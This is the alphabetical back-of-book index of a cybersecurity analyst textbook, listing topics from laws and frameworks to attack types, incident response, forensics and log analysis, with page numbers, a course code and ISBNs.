CFAA 460
chain of custody 435
change management 276
CHECK 254
Children's Online Privacy Protection Act, See COPPA
CIA 18
CIA triad
    overview 24
    technical controls 26
cipher 244
CIS 11
classification of information 23
clickjacking 135
client-side attacks 131
closed source intelligence 86
cloud infrastructure
    challenges 173
    hacking tools 175
cloud provider logs 292
Cloud Security Alliance, See CSA
CMMC 13
COBIT 11
code injection 132
coercive parsing 136
command and control, See C&C
command injection 132
Common Attack Pattern Enumeration and Classification, See CAPEC
Common Vulnerabilities and Exposures, See CVE
Common Vulnerability Scoring System, See CVSS
Common Weakness Enumeration, See CWE
communication
    within CSIRT 397
    with third parties 436
Communications-Electronics Security Group, See CESG
compensating control 44
compromised system analysis 445
Computer Fraud and Abuse Act, See CFAA
Computer Misuse Act 13
confidentiality 18
confidentiality, integrity, and availability, See CIA
confidentiality, integrity, and availability triad, See CIA triad
configuration files 286
configuration management 279
containment and mitigation tools 416
content-addressable memory, See CAM
Continuous Diagnostics and Mitigation, See CDM
continuous security monitoring, See CSM
Controlling the Assault of Non-Solicited Pornography and Marketing, See CAN-SPAM
Control Objectives for Information and Related Technology, See COBIT
cookies
    hijacking 135
    poisoning 135
COPPA 15
correlation analysis 282
Council for Registered Ethical Security Testers, See CREST
covert channels 202
CREST 254
cross-site request forgery, See XSRF
cross-site scripting, See XSS
cryptography 244
CSA 12
CSIRT
    communication 397
    communication with forensic analyst 425
    day in the life 396
    documentation 397
    external 395
    organization 394
CSM 274
CSRF, See XSRF
cut command 318
CVE 28
CVSS 27
CWE 29
cyber attack anatomy 78
cybercriminals 55
Cyber Kill Chain 78, 79
cyberlaw 460
cybersecurity
    defined 2
    elements 2
    incident response team, See CSIRT
    standards and frameworks 10
    threat motives 56
Cybersecurity Model Maturity Certification, See CMMC
cyberterrorism 56
cyberterrorists 56

D
data
    big 174
    collection 276
    exfiltration 202
    extraction 444
    mining 260
    preservation 444
    remanence 174
    remnants 174
    retention 281
data analytics 70
Data Encryption Standard, See DES
Data Protection Act 15
DDoS attack 162
deep learning 69
defense in depth 32
degaussing 415
denial of service attack, See DoS
de-perimeterization 16
DES 243
DHCP spoofing 154
diff command 319
digital signatures 26
directory traversal 134
disassembler 350
disaster recovery plan, See DRP
distributed denial of service attack, See DDoS attack
DNS
    amplification attack 162
    as C&C channel 181
    as target 88
    event logs 305
    filtering 413
    hijacking attack 154
    poisoning attack 153
documentation
    incident response 392
    investigation results 461
    security-related 45
    within CSIRT 397
Document Object Model attacks, See DOM-based attacks
Domain Name System, See DNS
DOM-based attacks 131
DoS
    attack 161
    attack techniques 161
    evasion techniques 163
    tools 164
doxing 59
drive usage
    tools 363
drones 162
DRP 393
dumpster diving 86, 111
Dynamic Host Configuration Protocol spoofing, See DHCP spoofing

E
eavesdropping 257
EDR 69, 291
endpoint detection and response, See EDR
Endpoint detection and response systems, See EDR
endpoint security 416
enumeration
    methods 88
    overview 86
    packet manipulation 261
environmental metrics 27
ETL 70
evasion techniques
    for DoS 163
    for reconnaissance 90
Event Viewer 321
evidence authentication 435
evil twin 380
excessive bandwidth usage 378
exploits
    current landscape 69
    web services 136
expressions
    building 475
    regular 472
extract, transform, and load, See ETL

F
Federal Information Security Management Act, See FISMA
file
    carving 444
    inclusion 134
    inclusion, local 135
    inclusion, remote 134
    sharing services 203
    systems 443
file system analysis tools 345, 362
find command 320
findstr command 320
fingerprinting
    defined 242
firewalls
    as security controls 25
    logs 288
    mitigation 416
FISMA 13
flash crowds 293
footprinting
    methods 86
    overview 86
forensic analysts
    CSIRT communication 425
    day in the life 430
    duties 425
forensics
    analysis 445
    data preservation 444
    investigation models 431
    investigation preparation 433
forensic toolkit
    open source software 436
    physical 438
    proprietary software 437
FTP logs 308

G
GAPP 14
GDPR 16
General Data Protection Regulation, See GDPR
Generally Accepted Privacy Principles, See GAPP
geo-velocity 381
GHDB 261
GLBA 15
golden tickets 193, 209
Google Hacking Database, See GHDB
Gramm–Leach–Bliley Act, See GLBA
grep command 317
grey box test 256

H
hacktivists 55
hashing 26
Health Insurance Portability and Accountability Act, See HIPAA
heuristic analysis 282
hijacking
    cookie 135
    DNS 114, 154
    session 152, 155
    tools 155
    URL 111
HIPAA 15, 17
hoax 109
honeypot 411
horizontal privilege escalation 125
HTTP/S 181
HTTP logs 307

I
IA 46
IAM
    overview 407
ICMP
    as C&C channel 182
ICMP flood attack 161
identity and access management, See IAM
identity theft 55
IDS 79
IDS/IPS
    attack mitigation 416
    logs 290
    solutions 291
impersonation 109, 152
incidents
    containment 400
    countermeasure 407
    evaluation and analysis 399
    handling 392
    handling tools 403
    identification 398
    impact 399
    indicator sources 398
    internal and external communication 397
    mitigation 417
    mitigation and eradication 401
    post-incident phase 402
    recovery 401
    response 41, 393
    scope 399
indicators of compromise, See IOCs
information processing
    overview 277
Information Security Forum, See ISF
Information Technology Assurance Framework, See ITAF
inherent risk 31
input validation 131
integrity 18
interconnection security agreement, See ISA
interference 288
International Organization for Standardization, See ISO
Internet Relay Chat, See IRC
interoperability agreement, See IA
intrusion detection system, See IDS
intrusion prevention system, See IPS
investigation scope 433
IOCs 372, 381, 398
IPS 30
IRC 181
ISA 46
ISA/IEC-62443 12
ISACA 11, 66
ISF 11
ISO
    compliance 17
ISO/IEC 27000 series 11, 14
ISO/IEC 29100 14
isolation 410
ITAF 11

J
job rotation 41
jump box 410

K
Kali Linux 259

L
lateral movement 191
law enforcement liaisons 461
least privilege 41
lessons learned report, See LLR
levels of authority 31
LFI 135
LLR 402
local file inclusion, See LFI
log analysis tools 316, 324
logical controls 25
logic bomb
    techniques 189
logs
    application 304
    auditing 278
    cloud provider 292
    DNS 305
    enrichment 277
    Event Viewer 321
    firewall 288
    FTP 308
    HTTP 307
    IDS/IPS 290
    network traffic 293
    operating system 302
    proxy 292
    SMTP 306
    SQL 309
    SSH 308
    switch and router 287
    tuning 295
    WAF 289
    Windows event 302
    wireless device 288
long tail analysis 325

M
machine learning 69
malvertisement 143
malware
    categories 143
    tools 148
management controls 26
mandatory vacation 41
man-in-the-middle attack 154
masked attacks 125
master service agreement, See MSA
MDM 408
memorandum of understanding, See MOU
memory analysis tools 350, 365
memory leaks 244
memory residents 210
message digest 26
metric groups 27
MITRE Corporation 28
mobile
    infrastructure hacking tools 170
    security trends 168
mobile device management, See MDM
mobile platform
    threats 169
modifiers 475
MOU 46
MSA 45

N
NAC 418
National Institute of Standards and Technology, See NIST
National Vulnerability Database, See NVD
NBAD 276
NDA 46
NERC 1300 12
NetFlow 276
network access control, See NAC
network analysis tools 352, 366
network-based intrusion detection system, See NIDS
network behavior anomaly detection, See NBAD
network sniffing 258
Network Time Protocol, See NTP
next-generation firewall, See NGFW
NGFW 289
NIDS 90
NIST
    800 Series Special Publications (SP) 10
    overview 10
    Privacy Framework 14
non-disclosure agreement, See NDA
normalization 275, 277
NTP reflected attack 162
NVD 29

O
OLA 46
open source intelligence 86
Open Source Security Testing Methodology Manual, See OSSTMM
Open Vulnerability and Assessment Language, See OVAL
Open Web Application Security Project, See OWASP
operating-level agreement, See OLA
operating system logs 302
operational controls 26
order of volatility 443
OSSTMM 254
OVAL 279
OWASP 12, 254

P
packet
    crafting 262
    generators 162
    manipulation 261
    trace analysis 91
parameterized queries 134
passive fingerprinting 242
pass the hash 192
passwords
    attacks 262
    cracking 124
    sniffing 123
    storage 125
patch management 408
Payment Card Industry Data Security Standard, See PCI DSS
PCI DSS
    definition of 16
penetration test
    phases 255
penetration testing
    categories 257
    external 256
    fingerprinting 242
    follow-up 263
    framework 254
    internal 256
    overview 238
    phases 254
    scope 256
    teams 254
    techniques 257
    third-party 254
    tools 258
    vs. vulnerability assessment 239
Penetration Testing Execution Standard, See PTES
permanent DoS attack 162
Personal Information Protection and Electronic Documents Act, See PIPEDA
pharming 110
phishing 110, 112, 113, 375
phlashing 162
physical controls 25
physical evidence storage 444
physical security 409
piggybacking 112
ping flood attack 161
PIPEDA 15
pivoting
    changing routing tables 198
    overview 196
    SSH 197
    VPN 196
policies
    life cycle 38
polymorphic viruses 144
port forwarding 196
port scanners 240, 241
prepared statements, See parameterized queries
preparing for log analysis 316
private key 193
privilege
    elevation 174
privilege elevation 125
privilege escalation 125, 174, 381
procedures
    lifecycle 39
processes 346, 363
Process Explorer 346
Process Monitor 347
professional hackers 55
program packers 210
proxy logs 292
PsExec 195
PTES 254
public key 146
publicly available information 278

Q
qualitative analysis 5
quality control 32
quantitative analysis 5
quid pro quo 109

R
rainbow tables 124, 262
ransomware 69, 143
ransomware techniques
    payloads 146
    payment 147
    vectors and warnings 145
reconnaissance
    evasion techniques 90
    processes 86
    social engineering in 114
    tools 90
    variables 89
recreational hackers 55
reflected
    attacks 131
    DoS attack 162
regex 472
regexp 472
Registry compromise 376
Registry Editor 344
regular expressions 472
remote access services 193
remote file inclusion, See RFI
reports
    documentation 461
residual risk 31
resource exhaustion 162
response planning 392
reverse engineering 350
RFC 2196 11
RFI 134
risk
    acceptance 30
    avoidance 30
    continuous monitoring and improvement 31
    determination 19
    equation 3
    exposure 5
    mitigation 30
    transference 30
risk analysis
    methods 5
    risk types 6
    system-specific 18
risk assessment
    documenting results of 20
    influences 17
risk management
    best practices 40
    business documentation 45
    determining 4
    process 3, 4
    process and procedure development 37
Risk Management Framework, See RMF
risk mitigation
    aggregate CIA scores 27
    classes of information 23
    response techniques 30
RMF 11
ROE 253
rogue access point 380
rogue accounts 189
rogue hardware 380
root cause analysis 403
rootkits
    techniques 187
rules of engagement, See ROE

S
salt 124
sandboxing 350
sanitization 415
Sarbanes–Oxley Act, See SOX Act
scanning
    defined 86
    tools 246
SCAP 246
script kiddies 54
SDEE 290
SDL 82
SDLC 11
SDN 293
search operators 472
search types 476
Secure Shell, See SSH
Secure Sockets Layer/Transport Layer Security, See SSL/TLS
security
    best practices 40
    documentation topics 40
    incident response 443
    information standards 280
    items monitored 275
    monitoring tools 275
    policy types 43
    procedure types 43
    technologies 69
    vulnerabilities 61, 68
Security Content Automation Protocol, See SCAP
security controls 25
Security Development Lifecycle, See SDL
Security Device Event Exchange, See SDEE
security information and event management, See SIEM
security intelligence
    collection and reporting automation 281
    collection challenges 272
    collection lifecycle 273
    collection plan 274
    correlation 332
    overview 272
    sources 276
security operations center, See SOC
semi-quantitative analysis 6
separation of duties 41
server-side attacks 131
service disruption 379
service-level agreement, See SLA
session
    fixation 135
    hijacking 152, 155
    prediction 135
session analysis tools 365
shoulder surfing 111
SIEM
    analysis 332
    data collection 281
    overview 332
    tools 333
Simple Mail Transfer Protocol, See SMTP
Simple Object Access Protocol, See SOAP
single loss expectancy, See SLE
single sign-on, See SSO
sinkhole 418
site books 393
SLA 46
Slashdot effect 163
SLE 19
SMiShing 110
SMTP 306
Smurf attack 161
sniffing passwords 123
SOA 45
SOAP 136
SOC 394
social engineering
    for pen testing 258
    for reconnaissance 114
    for systems hacking 126
    overview 108
    types 108
software-defined networking, See SDN
SOX Act 13
spam 111, 375
spear phishing 110
special operators 474
spim 111
spoofing
    IOCs 376
    overview 152
    tools 155
spyware
    techniques 145
SQL
    injection attack 132
    logs 309
SSAE 18 12
SSH
    logs 308
    pivoting 197
    tunnels 123
SSL/TLS 17
SSO 192
state data 287
statement of applicability, See SOA
steganography 203
stored attacks 131
STRIDE 81
Structured Query Language, See SQL
supply chain attacks 147
switch and router logs 287
syslog data 303
system hacking
    overview 122
    tools 126
system hardening 410
systems development life cycle, See SDLC

T
tabletop exercises 396
tactics, techniques, and procedures, See TTP
tailgating 111
TCPED architecture 72
technical controls 25
technical experts 461
technology evolution 69
temporal metrics 27
threat
    big data 174
    BYOD 169
    categories 83
    common targets 67
    current landscape 69
    intentions 58
    mobile platforms 169
    motives 56
    non-repudiation 174
    targets 59
    TCPED 71
    threat actors 54
    threat profile 62
    types 78
    virtualized environments 173
    wireless 168
threat hunting 372
threat intelligence 71
threat modeling
    approaches 80
    overview 80
    tools 82
Tigerscheme 255
timelines 434
tools
    Active Directory analysis 351
    cloud infrastructure hacking 175
    containment and mitigation 416
    DoS 164
    drive usage 363
    file system analysis 345, 362
    hijacking 155
    incident handling 403
    malware 148
    mobile infrastructure hacking 170
    network analysis 352, 366
    penetration testing 258
    process analysis 346, 363
    RAM analysis 350, 365
    reconnaissance 90
    security monitoring 275
    services analysis 348
    session analysis 365
    SIEM 333
    spoofing 155
    system hacking 126
    threat modeling 82
    vulnerability assessment testing 240
    vulnerability scanning 231, 246
traffic analysis 91
transport encryption 378
trend analysis 281
trends
    reports and documentation 71
Trojan horse
    techniques 144
TTP 78
typo squatting 111

U
UDDI 136
UDP flood 161
unauthorized account usage 381
unauthorized software 373
United States Computer Emergency Readiness Team, See US-CERT
Universal Description, Discovery, and Integration, See UDDI
unknown ports 377
unknown protocols 377
update management 408
US-CERT 279

V
verification 32
vertical privilege escalation 125
virtualization 173
virtualized environment threats 173
virtual machine, See VM targeting
viruses
    techniques 144
vishing 110
VM
    escape 173
    live migration 174
    malware detection 211
    targeting 173
volatile data collection 443
VPN pivoting 196
vulnerabilities
    virtual infrastructure 244
vulnerability
    applications 244
    devices 243
    information sources 245
    of network infrastructure 242
    report analysis 247
    results validation 247
    scan 245
    scanning tools 246
vulnerability assessment
    overview 238
    vs. penetration testing 239
vulnerability assessments
    implementation 239
    testing tools 240
vulnerability management
    documentation 234
    execution and report generation 231
    ongoing scanning 234
    overview 230
    plans of action 232
    process 230
    remediation 233
    remediation inhibitors 233
    requirements identification 231
    scanning frequency 234

W
WAF
    logs 289
    solutions 290
WAP 380
war driving 88, 257
web application firewall, See WAF
web services 136
Web Services Description Language, See WSDL
website defacement 379
whaling 110
white box test 256
whitelisting 412
Wi-Fi Protected Setup, See WPS
Windows event logs 302
Windows Management Instrumentation Command-line, See WMIC
Windows PowerShell 323
wireless access point, See WAP
wireless device logs 288
wireless threats 168
WMIC 194, 321
worms
    techniques 144
WPS 242
WSDL 136

X
XSRF 131
XSS 131

Z
zombies 162
Z shell 323

CNX0013S rev 1.0


ISBN-13 978-1-4246-4098-0
ISBN-10 1-4246-4098-9
